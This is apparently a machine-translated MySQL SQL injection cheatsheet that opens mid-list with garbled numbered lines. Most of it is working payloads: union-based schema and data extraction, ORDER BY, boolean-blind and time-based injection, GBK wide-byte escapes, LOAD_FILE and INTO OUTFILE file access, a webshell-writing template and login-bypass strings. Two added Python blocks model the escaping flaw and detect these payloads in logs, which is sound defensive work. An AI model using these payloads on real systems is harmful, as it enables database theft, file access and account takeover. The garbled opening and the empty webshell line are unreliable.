108 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64617461626173656e616d65 # 109 | Query column name 110 | Obtained from the previous step to the table named tablename, its hexadecimal code obtained 111 | UNION SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7461626c656e616d65 # 112 | retrieve data 113 | UNION SELECT GROUP_CONCAT(column_1,column_2 SEPARATOR+0x3c62723e) FROM databasename.tablename # 114 | insert / update / delete injection 115 | Reference: SQL Injection in Insert Update and Delete Statements Assuming the background statement is: 116 | insert into user(id,name,pass) values (1,"chybeta","123456"); 117 | order by after injection 118 | This part finishing self- sleepy Dragon: MySql injection science popularize by the sort statement, so you can use the conditional statements to make judgments, according to the return of the different sorts of results to determine the true and false conditions. 119 | Detection method 120 | Generally with oder or orderby variables is likely to be such an injection, when you know a field can be injected as follows: 121 | Original link: http://www.test.com/list.php?order=vote Sort according to the vote field. 122 | Find the largest number of votes to vote num Then construct the following link to see whether the sort of change. : 123 | list.php?order=abs(vote-(length(user())>0)*num)+asc 124 | Another method does not need to know any field information, use the rand function: 125 | list.php?order=rand(true) 126 | list.php?order=rand(false) 127 | The above two will return a different sort. 
#### Payload

The statement that checks whether the first character of the first table name is less than 128:

```
http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
```

### Error-based injection

### Blind injection

#### Blind injection scenarios

In many cases the earlier tests show that the page does not echo the extracted data, but whether the statement executes successfully still produces some corresponding change:

* A correct versus a wrong statement makes the page change slightly: try Boolean-based injection.
* A correct statement returns the normal page and a wrong statement returns the generic error page: try Boolean-based injection.
* Submitting a wrong statement does not affect the page's normal output: try time-based (delayed) injection.

Some simple constructs for making the judgment; in practice they have to be adapted to the situation:

```
CASE
IF()
IFNULL()
NULLIF()
```

#### Boolean blind injection (based on the response)

Submit a logical statement to infer one bit of information. Because the injection (generally) has to proceed character by character, scripts or tools (such as Burp Suite) are needed. Payloads:

```
' OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) < j) #
' OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) < j) #
' OR (SELECT SUBSTR(DATABASE(),i,1) < j) #
' OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j) #
' OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) < j #
...
```
For script usage see: Points on using scripts in CTF blind injection:

* Pay attention to encoding issues
* Pay attention to exception handling
* Pay attention to boundary handling

#### Time-based blind injection (based on delay)

A few functions are generally used. Their effect is to delay MySQL's execution, so the condition is detected from the difference in response time compared with the usual:

* SLEEP(n): pauses MySQL for n seconds
* BENCHMARK(count, expr): evaluates the expression expr count times

Some notes:

* Time-based blind injection is not as accurate, because it depends on the current network conditions.
* The delay is best kept under 30 seconds, otherwise it easily causes the MySQL API connection to time out.
* When the page shows no visible change at all, consider using time-based injection.

Detection method:

```
1 OR SLEEP(25)=0 LIMIT 1 #
1) OR SLEEP(25)=0 LIMIT 1 #
1' OR SLEEP(25)=0 LIMIT 1 #
') OR SLEEP(25)=0 LIMIT 1 #
1)) OR SLEEP(25)=0 LIMIT 1 #
SELECT SLEEP(25) #
```

Payload:

```
UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,BENCHMARK(100000,SHA1(1)),0)
UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,SLEEP(10),0)
...
```

### Wide byte injection

#### Principle

Given the following PHP code:

```php
...
mysql_query("SET NAMES 'gbk'");
....
$name = isset($_GET['name']) ? addslashes($_GET['name']) : 1;
$sql = "SELECT * FROM test WHERE names='{$name}'";
```

addslashes() prefixes single and double quotes with a backslash (\). When MySQL uses the GBK character set, it treats two bytes as one Chinese character, for example %df%5c. If we submit name=root%df%27, the server performs the following conversion: root%df%27 -> root%df%5c%27 -> root運'.
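The conversion above, modelled in Python as an added example (not part of the original cheatsheet or its PHP code): a byte-level escape like addslashes() is checked against what the server sees after decoding in the connection charset, next to the charset-aware escape a defender should use instead. It assumes the connection charset is GBK, as in the SET NAMES 'gbk' call above; all inputs are constructed.

```python
# Added example (not from the cheatsheet): models why byte-level addslashes()
# fails once the connection charset is GBK (SET NAMES 'gbk' above) and what a
# charset-aware escape must do instead. All sample inputs are constructed.

def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-level escaping like PHP addslashes() for ' " and backslash."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def quotes_survive(escaped: bytes, charset: str) -> bool:
    """Decode as the server will and check every quote still has its own
    backslash (not swallowed as the trail byte of a multibyte character)."""
    text = escaped.decode(charset, errors="replace")
    pending = False                    # True right after an unconsumed backslash
    for ch in text:
        if pending:
            pending = False            # this char is escaped, whatever it is
        elif ch == "\\":
            pending = True
        elif ch in "'\"":
            return False               # a bare quote reaches the SQL parser
    return True

def safe_escape(raw: bytes, charset: str) -> bytes:
    """Charset-aware escaping: reject bytes invalid in the connection charset,
    then escape characters, not bytes. In PHP this is what mysqli_set_charset()
    plus mysqli_real_escape_string() provide; prepared statements avoid it all."""
    try:
        text = raw.decode(charset)     # strict: 0xDF followed by 0x27 is invalid GBK
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not valid {charset}: {exc}") from None
    out = []
    for ch in text:
        if ch in "'\"\\":
            out.append("\\")
        out.append(ch)
    return "".join(out).encode(charset)

if __name__ == "__main__":
    for raw in (b"1'", b"1\xdf'"):    # constructed: plain quote vs. wide-byte prefix
        esc = addslashes_bytes(raw)
        print(raw, "->", esc, "| quote still escaped under gbk:", quotes_survive(esc, "gbk"))
```

The same escaped bytes pass under a UTF-8 connection and fail under GBK, which is why the charset the escaping function assumes must be the charset the connection actually uses.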
More can be found in: Character Encoding and SQL Injection in White Box Audit.

#### Payload

Eating the backslash:

```
index.php?name=1%df'
index.php?name=1%a1'
index.php?name=1%aa'
...
```

After addslashes, %XX%5c appears. If the byte value of the current character is greater than 128 it is treated as the lead byte of a wide character even if it is not a Chinese character, so %df is not the only byte that can eat the backslash.

Using the backslash:

```
index.php?name=%**%5c%5c%27
```

### Second-order injection

### File read and write

SQL injection can be used to import and export files: reading file contents, or writing content to a file. Query the user's file read/write privilege:

```sql
SELECT file_priv FROM mysql.user WHERE user = 'username';
```

#### load_file() read

Conditions:

* The file privilege is required.
* The absolute physical path of the file must be known.
* The file to be read must be smaller than max_allowed_packet:

```sql
SELECT @@max_allowed_packet;
```

Payload. Use the absolute path directly, paying attention to how slashes in the path are handled:

```
UNION SELECT LOAD_FILE("C://TEST.txt") #
UNION SELECT LOAD_FILE("C:/TEST.txt") #
UNION SELECT LOAD_FILE("C:\\TEST.txt") #
```

Using encoding:

```
UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) #
UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) #
```

#### SELECT ... INTO OUTFILE export

Conditions:

* Generally the absolute path has to be specified.
* The target directory must be writable.
* The outfile must not already exist.

Payload:

```
UNION SELECT DATABASE() INTO OUTFILE 'C:\\phpstudy\\WWW\\test\\1';
UNION SELECT DATABASE() INTO OUTFILE 'C:/phpstudy/WWW/test/1';
```

#### Writing a webshell

Conditions:

* The site's absolute physical path must be known, so the exported webshell can be reached.
* The export directory must be writable.
Payload:

```
UNION SELECT "" INTO OUTFILE 'C:/phpstudy/WWW/test/webshell.php';
```

### Universal password login

```
admin'--
admin'#
admin'/*
or '=' or
'or 1=1--
'or 1=1#
'or 1=1/*
') or '1'='1--
') or ('1'='1--
```

### PDO stacked queries
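As an added, defender-side example covering the union, boolean-blind, time-based, file and wide-byte payload shapes catalogued in the sections above (not part of the original cheatsheet): a small Python detector that URL-decodes the query string of each request in an access log and reports which of this page's categories match. The log lines, signature names and regular expressions are all constructed for this example.

```python
# Added example (not from the cheatsheet): a small log-side detector for the
# payload shapes catalogued above. It URL-decodes the query string of each
# request and reports which of this page's categories match. The access-log
# lines and signature names are constructed for the example.
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Matched against the URL-decoded query string as raw bytes, so the wide-byte
# check can look at the actual byte value (>= 0x81) in front of a quote.
SIGNATURES = {
    "union":      re.compile(rb"union\s+(all\s+)?select|order\s+by\s+\d+", re.I),
    "bool-blind": re.compile(rb"\b(ascii|substr|substring)\s*\(", re.I),
    "time-blind": re.compile(rb"\b(sleep|benchmark)\s*\(", re.I),
    "file":       re.compile(rb"load_file\s*\(|into\s+(out|dump)file\b", re.I),
    "wide-byte":  re.compile(rb"[\x81-\xfe]['\"]"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

def classify_query(decoded: bytes) -> set:
    """Return the page categories whose signature matches a decoded query."""
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_access_log(lines):
    """Return (line number, sorted categories) for every request that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        found = classify_query(unquote_to_bytes(query))
        if found:
            hits.append((n, sorted(found)))
    return hits

# Constructed log lines mirroring the payloads on this page (line 1 is benign).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /chybeta.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /chybeta.php?id=-1%20UNION%20SELECT%201,2,3%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /list.php?order=rand((select%20char(substring(table_name,1,1))%20from%20information_schema.tables%20limit%201)<=128) HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /chybeta.php?id=1\'%20OR%20SLEEP(25)=0%20LIMIT%201%20%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?name=1%df\' HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /chybeta.php?id=1%20UNION%20SELECT%20LOAD_FILE(0x433a5c5c544553542e747874)%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for lineno, cats in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(cats)}")
```

The signatures are deliberately broad triage rules: legitimate parameters can carry words like ORDER BY or SUBSTR, so tune them on real traffic and correlate time-blind hits with the request's response time before treating them as confirmed.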